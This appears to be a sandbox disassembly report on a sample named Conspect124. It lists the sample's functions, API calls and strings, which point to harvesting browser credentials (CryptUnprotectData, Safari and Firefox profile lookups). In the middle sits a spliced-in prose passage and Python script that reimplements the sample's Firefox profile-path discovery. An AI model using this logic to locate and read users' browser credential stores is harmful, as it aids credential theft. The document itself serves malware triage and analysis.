                                      • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                      APIs
                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: NtdllProc_Window
                                      • String ID:
                                      • API String ID: 4255912815-0
                                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                      APIs
                                      • _wcsicmp.MSVCRT ref: 004022A6
                                      • _wcsicmp.MSVCRT ref: 004022D7
                                      • _wcsicmp.MSVCRT ref: 00402305
                                      • _wcsicmp.MSVCRT ref: 00402333
                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                      • memset.MSVCRT ref: 0040265F
                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                      • API String ID: 2929817778-1134094380
                                      • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                      • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                      • String ID: :stringdata$ftp://$http://$https://
                                      • API String ID: 2787044678-1921111777
                                      • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                      • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                      • GetDC.USER32 ref: 004140E3
                                      • wcslen.MSVCRT ref: 00414123
                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                      • _snwprintf.MSVCRT ref: 00414244
                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                      • String ID: %s:$EDIT$STATIC
                                      • API String ID: 2080319088-3046471546
                                      • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                      • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                      APIs
                                      • EndDialog.USER32(?,?), ref: 00413221
                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                      • memset.MSVCRT ref: 00413292
                                      • memset.MSVCRT ref: 004132B4
                                      • memset.MSVCRT ref: 004132CD
                                      • memset.MSVCRT ref: 004132E1
                                      • memset.MSVCRT ref: 004132FB
                                      • memset.MSVCRT ref: 00413310
                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                      • memset.MSVCRT ref: 004133C0
                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                      • wcscpy.MSVCRT ref: 0041341F
                                      • _snwprintf.MSVCRT ref: 0041348E
                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                      • SetFocus.USER32(00000000), ref: 004134B7
                                      Strings
                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                      • {Unknown}, xrefs: 004132A6
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                      • API String ID: 4111938811-1819279800
                                      • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                      • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                      APIs
                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                      • EndDialog.USER32(?,?), ref: 0040135E
                                      • DeleteObject.GDI32(?), ref: 0040136A
                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                      • ShowWindow.USER32(00000000), ref: 00401398
                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                      • String ID:
                                      • API String ID: 829165378-0
                                      • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                      • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                      APIs
                                      • memset.MSVCRT ref: 00404172
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                      • wcscpy.MSVCRT ref: 004041D6
                                      • wcscpy.MSVCRT ref: 004041E7
                                      • memset.MSVCRT ref: 00404200
                                      • memset.MSVCRT ref: 00404215
                                      • _snwprintf.MSVCRT ref: 0040422F
                                      • wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 0040426E
                                      • memset.MSVCRT ref: 004042CD
                                      • memset.MSVCRT ref: 004042E2
                                      • _snwprintf.MSVCRT ref: 004042FE
                                      • wcscpy.MSVCRT ref: 00404311
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                      • API String ID: 2454223109-1580313836
                                      • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                      • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
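The string set of the function above (profiles.ini, General, Profile%d, IsRelative, Path) together with the _snwprintf/wcscpy calls and the GetFileAttributesW subcall is the pattern of a routine that walks a Mozilla-style profiles.ini and builds the on-disk path of each profile directory before testing that it exists. What the sample then reads out of those directories is not shown in this report. The following Python is an added worked example written for this page, not code recovered from the sample: it implements the same resolution logic on a constructed profiles.ini, handles both relative and absolute Path entries, and stops at the first missing ProfileN section, which is how a "Profile%d" loop terminates. The base directory, profile names and paths are assumptions.

```python
"""Resolve Mozilla profile directories from a profiles.ini registry.

Added example mirroring the trace in the report: format "Profile%d",
read IsRelative/Path from each section, build the profile directory
path, then (optionally) filter on an existence check standing in for
GetFileAttributesW.
"""
import configparser
from pathlib import PureWindowsPath

# Constructed sample input (not taken from the analysed sample).
SAMPLE_PROFILES_INI = """\
[General]
StartWithLastProfile=1
Version=2

[Profile0]
Name=default-release
IsRelative=1
Path=Profiles/abcd1234.default-release
Default=1

[Profile1]
Name=legacy
IsRelative=0
Path=D:\\Data\\FirefoxLegacy
"""

# Assumed directory that contains profiles.ini (%APPDATA%\Mozilla\Firefox).
FIREFOX_DIR = PureWindowsPath(r"C:\Users\victim\AppData\Roaming\Mozilla\Firefox")


def resolve_profiles(ini_text, base_dir, exists=None):
    """Return [(name, full_path, is_default), ...] for every ProfileN section.

    Iteration stops at the first missing ProfileN section. `exists` is an
    optional predicate standing in for the GetFileAttributesW check seen in
    the trace; profiles it rejects are dropped from the result.
    """
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case (IsRelative, Path, ...)
    cp.read_string(ini_text)

    results = []
    i = 0
    while cp.has_section(f"Profile{i}"):
        sec = cp[f"Profile{i}"]
        i += 1
        raw_path = sec.get("Path")
        if not raw_path:
            continue
        # IsRelative=1 (the default when absent) means Path is relative
        # to the directory holding profiles.ini; otherwise it is absolute.
        if sec.get("IsRelative", "1") == "1":
            full = PureWindowsPath(base_dir) / raw_path
        else:
            full = PureWindowsPath(raw_path)
        if exists is not None and not exists(full):
            continue
        results.append((sec.get("Name", ""), str(full), sec.get("Default") == "1"))
    return results


if __name__ == "__main__":
    for name, path, default in resolve_profiles(SAMPLE_PROFILES_INI, FIREFOX_DIR):
        print(f"{name:16s} default={default!s:5s} {path}")
```

For triage, the same function run against a real profiles.ini tells you exactly which profile directories a stealer with this routine would have reached on the host, which narrows the set of credential stores to review.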
                                      APIs
                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                      • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                      • API String ID: 4054529287-3175352466
                                      • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                      • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                      APIs
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                      • API String ID: 667068680-2887671607
                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                      • API String ID: 1607361635-601624466
                                      • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                      • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _snwprintf$memset$wcscpy
                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                      • API String ID: 2000436516-3842416460
                                      • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                      • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                      APIs
                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                      • String ID:
                                      • API String ID: 1043902810-0
                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
